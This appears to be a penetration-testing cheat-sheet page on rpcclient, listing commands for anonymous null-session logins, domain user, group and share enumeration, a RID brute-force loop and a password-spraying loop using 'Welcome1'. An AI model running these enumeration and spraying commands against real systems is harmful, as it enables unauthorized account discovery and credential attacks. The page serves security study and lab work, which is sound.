rpcclient

rpcclient -U "" 10.129.14.128

rpcclient -U'%' 10.10.110.17

# Commands
enumdomusers

# Just see the 0x info from enumdomusers
queryuser <RID>	
queryuser 0x3e9 
querygroup 0x201

# Will return the username,user_rid,group_rid    
for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

srvinfo

enumdomains

querydominfo

netshareenumall

netsharegetinfo <share>

# This will display the usernames
enumdomusers

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Previoussmbmap Nextimpacket

Last updated 10 months ago